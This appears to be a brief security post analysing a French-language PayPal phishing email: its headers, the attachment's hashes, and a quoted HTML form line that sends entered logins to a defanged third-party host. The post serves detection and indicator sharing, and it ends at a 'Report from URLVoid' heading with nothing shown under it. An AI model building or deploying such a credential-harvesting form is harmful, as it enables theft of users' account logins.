A new phishing email is being used to spread HTML files that contain fake PayPal login forms:
Header details:
Received: from ns3.komvos.gr (ns3.komvos.gr [88.198.65.153])
Received: by ns3.komvos.gr (Postfix, from userid 48)
Subject: Attention ! Votre compte PayPal a été limité !
From: Service Paypal
Date: Mon, 4 Jun 2012 13:00:12 +0300 (EEST)
Content-Disposition: attachment; filename="Informations Compte Paypal .zip"
There is a ZIP file attached:
File: Informations Compte Paypal .zip
Size: 5391 bytes
MD5: 2C573252C917A4E4FFC2138E48B50F2B
SHA1: 28B36A51D9215F143AC449984A27A74D520679B7
SHA256: 5E45F7E1988AE2F1B8721226D88AB7DD9EB8A395FB4C501E145554F49655C8C9
SHA384: EE4D4201B65716A986162D43F289FA695263B9BC3EB839F08F185F2B1A1DEC777C68439D91C068DAA80768712B53D80E
SHA512: BA111FCB751F40837E58F50F76314380E8D52FD97B5E98F7855D813433C8FFCDDD26AF58DEE7894F4BC4D2AF53760268FBE25C650FCDC55B0796F6D316E5147A
The extracted file is an .HTML file:
File: Informations Compte Paypal .html
Size: 22525 bytes
MD5: 0500506DEDA37FBC1A7CD19C22173764
SHA1: AB7F78D2A70460418E858E4783F5D3F5376CF2E2
SHA256: F81D8AAA2996D7FB13320FD6F05C37AA1A1CD7BA7BCD29823B03731ED3A067E2
SHA384: 7EEA087DEEEE72203E81F7F606CDAD90F4F5EB1233A95DC692556AFE6AA5B94426E7B84881101F21BF84730B0E132EE3
SHA512: 0B858A75C10EBDBFC9A6D7CDE4C1AB34199B67A51999AB59E85086182C93EF66C20956BA62E68647C27B91704D5A2D4E2EA68749C77ED39DF4AB1F679245BE18
From this HTML code:
<form action="hxxp:// byrongoldworks .com /mainbody.php" method="post" name="zaz" onsubmit="return verif_formulaire()">
we can see that whatever the victim types into the fake login form is POSTed not to PayPal but to a third-party site under the phisher's control:
hxxp:// byrongoldworks .com /mainbody.php
Report from URLVoid: